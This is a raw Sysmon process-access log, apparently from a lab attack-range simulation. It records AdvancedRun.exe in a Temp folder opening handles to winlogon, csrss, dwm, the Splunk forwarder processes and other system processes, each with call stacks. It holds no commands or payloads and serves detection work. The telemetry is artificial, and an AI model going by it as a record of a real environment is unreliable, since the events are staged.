18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015437Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015436Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015435Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015434Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004015433Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015432Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015431Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015430Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015429Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015428Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015427Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015426Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015425Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015424Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015423Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015422Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015421Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
